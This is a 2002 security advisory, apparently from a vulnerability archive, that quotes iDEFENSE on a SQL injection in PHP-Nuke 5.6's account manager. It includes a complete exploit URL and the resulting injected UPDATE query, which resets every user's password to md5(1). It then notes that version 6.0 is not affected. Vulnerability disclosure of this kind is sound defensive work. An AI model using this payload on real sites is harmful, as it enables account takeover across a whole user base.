4th Nov 2002 [SBWID-5790]
COMMAND
PHP-Nuke SQL injection
SYSTEMS AFFECTED
PHP-Nuke 5.6
PROBLEM
From iDEFENSE Security Advisory [10.31.02c]
http://www.idefense.com/advisory/10.31.02c.txt
Credits goes to kill9 (kill9@hackers.com) with discovering this
vulnerability :
--snip--
PHP-Nuke is susceptible to an SQL injection attack that allows an
attacker to modify a user's table to his or her liking. It is possible
for any registered user of the target system to launch this attack by
feeding certain unfiltered characters to the account manager module.
The attacker can target a specific user or all system users at once.
The key is the ability to insert a backslash into the "bio" field,
thereby escaping a quote and leaving the SQL query open for injection.
The following example will modify every PHP-Nuke users password to
"1.":
Exploitation requires that the attacker log on, enter the account
manager and determine his or her UID through the source of the page. If
the attacker's UID is 2, he or she can then launch the attack by
requesting the following URL:
modules.php?name=Your_Account&op=saveuser&uid=2&bio=%5c&EditedMessage=no&pass=xxxxx&vpass=xxxxx&newsletter=,+bio=0,+pass=md5(1)/*
The injected query is constructed as follows:
UPDATE nuke_users
SET name = '',
email = '',
femail = '',
url = 'http://',
pass = 'xxxxx',
+--[ bio = '\',
| user_avatar = '',
| user_icq = '',
| user_occ = '',
| user_from = '',
| user_intrest = '',
| user_sig = '',
| user_aim = '',
| user_yim = '',
| user_msnm = '',
+--[ newsletter = ',
bio=0,pass=md5(1)/*' WHERE uid='2'
The marked area is all treated as a value to store into bio. The
"where" clause is commented out, leaving an update statement that
updates the entire table (ie: all users) to having a password of
MD5(1).
--snap--
SOLUTION
PHP-Nuke version 6.0 is not vulnerable to the SQL injection attack.